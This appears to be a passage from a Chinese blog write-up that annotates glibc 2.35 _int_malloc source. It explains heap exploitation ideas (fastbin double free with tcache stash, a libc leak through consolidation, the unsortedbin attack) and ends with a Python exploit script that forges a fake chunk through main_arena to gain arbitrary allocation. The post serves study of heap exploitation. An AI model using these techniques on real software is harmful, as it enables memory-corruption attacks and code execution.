fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert (chunk_main_arena (fwd));
while ((unsigned long) size < chunksize_nomask (fwd))
{
fwd = fwd->fd_nextsize;
assert (chunk_main_arena (fwd));
}

if ((unsigned long) size
== (unsigned long) chunksize_nomask (fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
}
}
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}

mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count; //检查tcachebin链表中的chunk是否超过范围
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif

#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}

#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached) //如果之前把chunk放到tcachebin里面 这里取出来就可以了
{
return tcache_get (tc_idx);
}
#endif

/*
If a large request, scan through the chunks of current bin in
sorted order to find smallest that fits. Use the skip list for this.
*/
//如果申请的chunk大小在largebin的范围里 就扫描largebinchunk来查找最合适的chunk
if (!in_smallbin_range (nb))
{
bin = bin_at (av, idx);

/* skip scan if empty or largest chunk is too small */
if ((victim = first (bin)) != bin
&& (unsigned long) chunksize_nomask (victim)
>= (unsigned long) (nb))
{
victim = victim->bk_nextsize;
while (((unsigned long) (size = chunksize (victim)) <
(unsigned long) (nb)))
victim = victim->bk_nextsize;

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted. */
if (victim != last (bin)
&& chunksize_nomask (victim)
== chunksize_nomask (victim->fd))
victim = victim->fd;

remainder_size = size - nb;
unlink_chunk (av, victim);

/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
}
/* Split */
else
{
remainder = chunk_at_offset (victim, nb);
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
malloc_printerr ("malloc(): corrupted unsorted chunks");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);
}
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

/*
Search for a chunk by scanning bins, starting with next largest
bin. This search is strictly by best-fit; i.e., the smallest
(with ties going to approximately the least recently used) chunk
that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
The particular case of skipping all bins during warm-up phases
when no chunks have been returned yet is faster than it might look.
*/

++idx;
bin = bin_at (av, idx); //后面这一部分关于内存桶的 暂时没看懂
block = idx2block (idx);
map = av->binmap[block];
bit = idx2bit (idx);

for (;; )
{
/* Skip rest of block if there are no more set bits in this block. */
if (bit > map || bit == 0)
{
do
{
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
}
while ((map = av->binmap[block]) == 0);

bin = bin_at (av, (block << BINMAPSHIFT));
bit = 1;
}

/* Advance to bin with set bit. There must be one. */
while ((bit & map) == 0)
{
bin = next_bin (bin);
bit <<= 1;
assert (bit != 0);
}

/* Inspect the bin. It is likely to be non-empty */
victim = last (bin);

/* If a false alarm (empty bin), clear the bit. */
if (victim == bin)
{
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin (bin);
bit <<= 1;
}

else
{
size = chunksize (victim);

/* We know the first chunk in this bin is big enough to use. */
assert ((unsigned long) (size) >= (unsigned long) (nb));

remainder_size = size - nb;

/* unlink */
unlink_chunk (av, victim);

/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
}

/* Split */
else
{
remainder = chunk_at_offset (victim, nb);

/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
malloc_printerr ("malloc(): corrupted unsorted chunks 2");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range (nb))
av->last_remainder = remainder;
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);
}
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

use_top:
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize (victim);

if (__glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): corrupted top size");

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
else
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
return p;
}
}
}

这几百行代码读下来 感觉还是有点蒙蔽的 总结一下
首先判断nb是否属于fastbin的范围 如果属于则获取fastbin对应链表的链表头 当链表中存在空闲chunk的时候 将chunk从fastbin链表中取出(遵从先进先出原则) 同时 如果开启了tcachebin机制 当tcachebin对应链表尚有空闲(一条链表默认最大存储7个chunk) 并且fastbin该链表中取出一个chunk后 仍有剩余 就会触发tcache stash机制 会将fastbin链表中的chunk转移到tcachebin中
这一机制存在漏洞利用的可能 在glibc2.29以后 tcachebin针对double free进行了安全防护 当chunk被释放进入链表后 chunk的bk域就会被写入key key的值为堆地址去除后三位 攻击者需要更改key 才能实现double free 而fastbin对于double free的检查 只会比较上一次和这次释放的指针是否一致 所以就可以通过在fastbin中实现double free 然后触发tcache stash来将链表放到tcachebin中
接着如果nb大小在smallbin的范围内 就遍历smallbin 因为smallbin的链表和fastbin tcachebin一样 每一个范围内的大小都有一个链表 查询起来更加快速 这一段代码同样引入了tcache stash机制 来确保内存申请的效率
如果nb的大小在largebin的范围内 就会调用malloc_consolidata函数 这个函数会合并物理相邻的fastbin chunk 很多时候 这一个函数也会导致许多漏洞 比如此时两个物理相邻的fastbin chunkA和B 如果用户手里有UAF的权限 在触发malloc_consolidata之前 控制的只是一个fastbin chunk 触发只会 就会合并成smallbin chunk 此时chunk的fd和bk域就填充了libc真实地址 如果用户利用UAF漏洞 就可以泄露libc基址
接下来的代码负责处理从unsortedbin中申请chunk 最为关键的就是如下这些check 这些check保证了攻击者不会构造unsortedbin chunk的fd域和bk域 从而实现任意地址申请chunk以及任意地址写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk; //获取链表中的倒数第二个chunk
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size); //获取victim下一个相邻chunk的地址
if (__glibc_unlikely (size <= CHUNK_HDR_SZ) //安全性检查
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ) //检查下一个chunk的size是否符合要求
|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size)) //检查next_chunk的prev_size是否正确
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim) //检查链表结构
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next))) //检查next_chunk的prev_inuse位是否为0
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

unsorted_chunks(av)可以获取unsortedbin链表的链表头指针 当链表头的bk域指向自己 也就是链表中 链表头和链表尾都为同一个chunk的时候 说明这个链表中已经没有其他的chunk了 那么就不会进入while循环 这一个check看似简单 但是实际上起到了非常大的防御功能 我在伪造chunk时 就是无法绕过这一个check来跳过while循环
第一个check 检查victim的size是否符合要求
第二个和第三个check 检查victim物理相邻的chunk的size和prev_size是否符合要求
第四个check 检查victim上一个chunk(bck)的fd域是否指向victim 确保链表的完整性
第五个check 检查next_chunk的prev_size的inuse位 因为处于unsortedbin链表中的chunk肯定都是处于free状态的 如果inuse不为0 就触发报错
同时 在从unsortedbin中申请chunk后 还会有两句负责完善chunk的fd域和bk域 从而确保链表连通性

1
2
3
4
5
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim)) //安全性检查
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

这两句即是2.31版本以前的unsortedbin attack攻击手法所利用到的 通过覆盖unsortedbin chunk的bk域 将其修改为ptr_addr - 0x10 在执行到 bck->fd = unsorted_chunks(av)时 就会往ptr_addr写入unsortedbin的链表头地址 配合io链就可以覆写IO_list_all 从而伪造io结构体 劫持程序执行流
但是在2.31以后 作者优化了对unsortedbin chunk的链表检查 在不修改main_arena的情况下 已经无法实现任意地址写了 在后续的步骤3中 我将说明如何通过修改main_arena来实现任意地址申请的逻辑漏洞
回到源代码中 如果要申请的chunk大小等于链表中的chunk大小 会先将符合要求的chunk转移到tcachebin中(如果对应链表尚有空闲) 随后在第二次执行时 由于链表已经为空不进入while循环 直接从tcachebin中申请chunk
如果大小不一致 会根据unsortedbin中的chunk大小来判断要将chunk放入largebin还是smallbin 随后再进行分配

如果想要伪造一个fake chunk加入unsortedbin链表 并且实现利用realloc函数把这个fake chunk申请出来 就需要更改链表头chunk的bk域
接下来 需要更改这个fake chunk的fd域 让其指向main_arena 同时要做好伪造 修改fake chunk的size域 以及其物理相邻的下一个chunk的chunk头信息也要做好伪造
做好这些前置工作 还需要绕过的判断就是 如何不进入while循环 只要我们没有完善链表结构 程序就会一直认为 链表中还存在chunk 就一直遍历 报错是必然发生的事
想要把fake chunk从链表中脱离出来 要解决的关键就是如下这个check

1
2
3
4
5
6
victim = unsorted_chunks (av)->bk  
bck = victim->bk;  
if (__glibc_unlikely (bck->fd != victim)  //检查链表结构  
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))  
            malloc_printerr ("malloc(): unsorted double linked list corrupted");  
victim = unsorted_chunks (av)->bk) != unsorted_chunks (av) 

Victim指向fake chunk bck指向fake chunk的bk域
需要使得bck的fd域指向fake chunk 还需要使得fake chunk指向main_arena
看似很容易满足 但是关键是下次进入while循环时 victim就会指向bck
如果此时bck的bk域不等于main_arena 就会重新进入while循环 那么此时bck的链表结构又需要重新布置 并且进入死循环
但是实际上这是不可能的 除非我们去申请的是main_arena 但是这仍然需要我们拥有更改main_arena的权限 这样才能绕过size和prevsize的检查
那么既然必须更改main_arena 有没有更容易的篡改方案 首先把fake chunk的bk域改为指向unsorted_chunks(av) 那么while循环的check就可以绕过去了
接下来则是需要绕过bck->fd == victim这一条判断
使得unsorted_chunks(av)指向victim 即修改main_arena+96+0x10处为vitcim

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
bss_addr = elf.bss(0x300)
add(0x500,"aaaa")#0
add(0x10,"aaaa")#1
add(0x10,"aaaa")#2
delete(1)
delete(2)
show(1)
heap_addr = u64(io.recv(5).ljust(8,b'\x00'))<<12
success("heap_addrr :"+hex(heap_addr))
delete(0)
show(0)
libc_addr = u64(io.recv(6).ljust(8,b'\x00'))-0x1f2ce0
success("libc_addr :"+hex(libc_addr))


add(0x500,"aaaa")#3
add(0x10,"aaaa")#4
add(0x10,"aaaa")#5

add(0x500,"aaaa")#6
add(0x10,"aaaa")#7
delete(6)
payload = p64(libc_addr + 0x1f2ce0)+p64(bss_addr)

edit(6,len(payload),payload)
any_write(p64(bss_addr+0x8),p64(0x30)+p64(heap_addr+0x7e0)+p64(libc_addr+0x1f2ce0))
payload = p64(0x30)+p64(0x20)
any_write(p64(bss_addr+0x30),payload)
any_write(p64(libc_addr+0x1f2ce0+0x10),p64(bss_addr))
gdb.attach(io,'b *malloc+10')
add(0x20,"aaaa")#8
pause()

image.png
可以成功的把伪造的fake chunk申请出来
为了实现这一次非法内存申请 需要泄露heap地址以及libc地址
修改unsortedbin chunk的bk域
修改fake chunk的size域 fd域 bk域 以及其next chunk的prev_size和size域
修改main_arena+96+0x10处为fake chunk
由此可见glibc2.35对于unsortedbin的检查十分严格 我们需要对内存空间有极大的可控制性才能绕过check

Prev
2024-12-20 22:30:24 # wp
Next